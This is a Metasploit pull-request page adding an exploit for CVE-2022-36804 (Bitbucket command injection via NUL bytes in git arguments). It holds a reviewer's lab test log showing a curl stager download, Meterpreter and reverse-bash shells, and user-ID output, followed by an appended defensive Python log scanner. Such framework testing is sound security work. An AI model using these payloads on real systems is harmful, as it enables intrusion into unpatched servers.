Add exploit for CVE-2022-36804 #17042
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Worked great for me!
With the latest round of changes, everything I've tested is working great now including different command stager flavors and a few command payloads.
Testing Output
Bunch of payloads working correctly while targeting 7.21.3
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > show options
Module options (exploit/linux/http/bitbucket_git_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.27 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 7990 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base URI of Bitbucket application
URIPATH no The URI to use for this exploit (default is random)
USERNAME no The username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Dropper
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set CMDSTAGER::FLAVOR curl
CMDSTAGER::FLAVOR => curl
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Using URL: http://192.168.159.128:8080/oD3783Hs
[*] Client 192.168.159.27 (curl/7.81.0) requested /oD3783Hs
[*] Sending payload to 192.168.159.27 (curl/7.81.0)
[*] Sending stage (3020772 bytes) to 192.168.159.27
[*] Sending stage (3020772 bytes) to 192.168.159.10
[*] Meterpreter session 7 opened (192.168.159.128:4444 -> 192.168.159.27:38282) at 2022-09-21 13:02:50 -0400
[*] Sending stage (3020772 bytes) to 192.168.159.10
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.159.27
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.27 - Meterpreter session 7 closed. Reason: Died
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set CMDSTAGER
[-] Meterpreter session 8 is not valid and will be closed
:[-] Meterpreter session 9 is not valid and will be closed
[*] 192.168.159.27 - Meterpreter session 8 closed.
[*] 192.168.159.27 - Meterpreter session 9 closed.
:FLAVOR bourne
CMDSTAGER::FLAVOR => bourne
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Sending stage (3020772 bytes) to 192.168.159.27
[*] Meterpreter session 10 opened (192.168.159.128:5555 -> 192.168.159.27:47800) at 2022-09-21 13:03:30 -0400
[*] Command Stager progress - 100.00% done (823/823 bytes)
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.159.27
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 10...
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set TARGET Unix\ Command
TARGET => Unix Command
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Sending stage (40168 bytes) to 192.168.159.27
[*] Meterpreter session 11 opened (192.168.159.128:5555 -> 192.168.159.27:41064) at 2022-09-21 13:04:08 -0400
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : ubuntu2004
OS : Linux 5.15.0-48-generic #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Command shell session 12 opened (192.168.159.128:5555 -> 192.168.159.27:54452) at 2022-09-21 13:04:51 -0400
id
uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
^Z
Background session 12? [y/N] y
msf6 exploit(linux/http/bitbucket_git_cmd_injection) >
Release Notes
Adds an exploit for CVE-2022-36804, which is an unauthenticated RCE in Bitbucket.
Nicely done. :)
Description
Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection in multiple API endpoints. Successful exploitation requires access to a public repository. Supplying NULL bytes to the git command used at vulnerable endpoints allows the passage of extra arguments to the command, enabling command injection.
Verification
atlbitbucket user
Scenarios
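The Description above notes that the injection depends on NUL bytes reaching the git arguments behind the API endpoints. As an added example, not part of this PR or the module's code, here is a defender-side access-log check: it fully percent-decodes each request URI (so double-encoded `%2500` is caught too) and flags any request under the Bitbucket base URI that carries a NUL byte, which no legitimate client sends. The log lines and the `/rest/example` path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed combined-format access-log lines (not from the original PR).
# The /rest/example path is a hypothetical placeholder, not a real endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Sep/2022:13:02:50 -0400] "GET /projects/PWNME/repos/pwnme/browse HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Sep/2022:13:02:51 -0400] "GET /rest/example?at=%00--placeholder-arg HTTP/1.1" 200 12 "-" "curl/7.81.0"
10.0.0.9 - - [21/Sep/2022:13:02:52 -0400] "GET /rest/example?at=%2500--placeholder-arg HTTP/1.1" 200 12 "-" "curl/7.81.0"
10.0.0.7 - - [21/Sep/2022:13:02:53 -0400] "GET /projects/PWNME/repos/pwnme/raw/README.md?at=refs%2Fheads%2Fmain HTTP/1.1" 200 300 "-" "git/2.34"
"""

# Matches the fields of a combined-format log line that the check needs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing, so %2500 -> %00 -> NUL."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_nul(uri):
    """True when the decoded request URI contains a NUL byte."""
    return "\x00" in decode_fully(uri)


def scan_log(text, base_uri="/"):
    """Return the requests under base_uri (the module's TARGETURI) that carry a NUL."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match or not match.group("uri").startswith(base_uri):
            continue
        if has_nul(match.group("uri")):
            hits.append({"src": match.group("src"), "ts": match.group("ts"),
                         "uri": match.group("uri"), "status": int(match.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} NUL in request: {hit['uri']} ({hit['status']})")
```

A 200 response on a flagged request is worth treating as a possible success rather than a blocked probe, since the module's own output above shows the injected request completing normally.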